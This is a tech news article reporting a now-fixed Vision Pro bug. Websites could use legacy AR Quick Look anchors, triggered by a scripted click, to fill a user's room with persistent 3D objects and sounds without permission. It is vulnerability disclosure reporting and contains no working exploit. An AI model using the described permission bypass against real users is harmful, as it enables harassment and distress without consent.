Apple has fixed a Vision Pro bug which would have allowed a website to fill your room with an unlimited number of virtual 3D objects. Those objects – flying bats in the proof of concept – would then persist even after you quit Safari.
The bug was discovered by a cybersecurity researcher who says Apple took a lot of care to protect against this type of exploit, but it forgot one thing …
Apple has protections against this
Ryan Pickren says that Apple has a specific protection against this in Vision Pro apps.
One of the big areas Apple is rightfully protective of is safeguarding who and what is allowed to enter your personal space inside Vision Pro. Wouldn’t it be awful if a malicious app could scare you by spawning items behind you? Well thankfully, by default, native apps are restricted to a “Shared Space” context, where they act predictably and can be easily closed.
If an app wants a more immersive experience, they must receive explicit permission from the user via an OS-level prompt that places them in a trusted “Full Space” context.
Websites can use experimental features to achieve the same thing, but Apple extended the Full Space model to apply to websites too.
But the company forgot one thing
But Apple forgot about an AR feature it developed back in 2018. It’s still there in WebKit today, and that includes the Vision Pro build.
There is an older web-based 3D model viewing standard that the visionOS team seemed to have forgotten about – Apple AR Kit Quick Look! Back in 2018, when Apple first started to dabble in AR/VR/XR, they developed a new HTML-based method in iOS for rendering 3D Pixar files called In-Place USDZ Viewing […]
After some quick testing, I noticed that this standard is still alive and well in WebKit (including the visionOS build), and even supports the more modern “.reality” filetype made by Apple’s Reality Composer. In fact, we can even add Spatial Audio so it feels like sound is coming from the object itself. Even better, these features work by default out-of-the-box, so the victim does not need to enable any fancy experimental features.
And here is the fun part – Safari does not enforce any type of permission model on this feature. Furthermore, it does not even require this anchor tag to have been “clicked” by the human. So programatic JavaScript clicking (i.e. document.querySelector(‘a’).click()) works no problem! This means that we can launch an arbitrary number of 3D, animated, sound-creating, objects without any user interaction whatsoever.
If the victim just views our website in Vision Pro, we can instantly fill their room with hundreds of crawling spiders and screeching bats! Freaky stuff.
All a user has to do is simply visit a website, and a couple of seconds later …
Now fixed
Apple paid Pickren an undisclosed, uh, bug bounty for identifying the vulnerability, and it’s now fixed.
Main image: Todd Cravens on Unsplash. Bats gif: Ryan Pickren.
FTC: We use income earning auto affiliate links. More.